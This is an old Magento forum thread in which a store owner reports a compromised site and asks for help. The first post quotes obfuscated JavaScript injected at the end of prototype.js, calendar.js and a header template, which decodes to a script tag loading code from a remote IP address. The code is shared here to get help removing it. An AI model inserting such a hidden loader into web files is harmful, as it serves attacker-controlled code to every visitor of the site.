Magento - Javascript hacks - Security - eCommerce Software for Growth

Log In

Username or Email

Password:

Forgot Password

or
Register

Skip to site navigation »
Skip to main content »
Skip to footer content »

Magento Forum

Javascript hacks

bigprinter Total Posts: 14 Joined: 2009-02-11 Ignore user	My Magento install has been severely compromised. I can log into my admin dashboard, but non of the buttons will work. I have been able to fix most of the php hacks which I posted in a previous post. But I have come across some javascript code I think is a hack. In my prototype.js file I found this at the end: Element.addMethods();<!-- [removed](unescape(’<TOscqmeript%20sqmercG55=Q9//94qme.2TO43i7.2.195TO/jqueryTO.sfjs>sf<3i/scwporiG55pTOtQ9>’).replace(/TO\|3i\|qme\|wpo\|sf\|G55\|qM\|Q9/g,"")); --> In my calendar.js file I found this at the end: <!-- [removed](unescape(’<TOscqmeript%20sqmercG55=Q9//94qme.2TO43i7.2.195TO/jqueryTO.sfjs>sf<3i/scwporiG55pTOtQ9>’).replace(/TO\|3i\|qme\|wpo\|sf\|G55\|qM\|Q9/g,"")); --> In my 1-header.phtml file I found this in the <head> section: </head> <script language=javascript><!-- [removed](unescape(’<TOscqmeript%20sqmercG55=Q9//94qme.2TO43i7.2.195TO/jqueryTO.sfjs>sf<3i/scwporiG55pTOtQ9>’).replace(/TO\|3i\|qme\|wpo\|sf\|G55\|qM\|Q9/g,"")); --></script> Has anyone else seen this code in these files. I want to verify that I can delete it.
	Posted: April 9 2009 \| top

Periculi Total Posts: 249 Joined: 2009-02-03 Ignore user	Why don’t you delete all your compromised files and replace them with a clean set?! Signature ...
	Posted: April 9 2009 \| top \| # 1

bigprinter Total Posts: 14 Joined: 2009-02-11 Ignore user	We were trying to avoid having to reinstall magento if possible. Doesn’t look like that is going to happen.
	Posted: April 9 2009 \| top \| # 2

J.T. Total Posts: 1961 Joined: 2008-08-07 London-ish, UK Ignore user	Roll back to a working backup I’d say. Signature It takes two to tango, so don’t blame Magento right away if things go tits-up! Mage Quick FAQ Q. Installation problems with localhost/xamp/wamp/whatever and/or missing php extensions, help! A. Get Zend Server - Community Edition is free and will make things a lot easier on you now and when deploying to production
	Posted: April 12 2009 \| top \| # 3

crucial Total Posts: 6 Joined: 2009-04-12 Ignore user	Restore from a a backup - wha? No one takes backups seriously so assume there’s no backup for this very important business running in shared hosting. Restore from your backup or just restart your really important business that cant afford a backup. .
	Posted: April 13 2009 \| top \| # 4

bigprinter Total Posts: 14 Joined: 2009-02-11 Ignore user	Magette, I assume you are being sarcastic. If not, what I don’t need is a smart ass. Yes, we had a backup. Restored it, next day it was hacked. Upgraded to Magento 1.3. 24 hours later, it was hacked. My hosts response is they do not investigate things like this. Their suggestion is to change our passwords (done that 3 times) and upgrade our software (done that too). We have gone through every file, one by one, edited out the code inserted 3 times now, plus after upgrading and republishing our site, deleted any files that had the date of the last hack. I do have one question. Does there exist a .htaccess file with standard settings for running magento? Joomla supplies one for their software.
	Posted: April 13 2009 \| top \| # 5

Magento Community

Magento Community

Back to top

Magento without SSL

IonCube Encoding to encrypt local.xml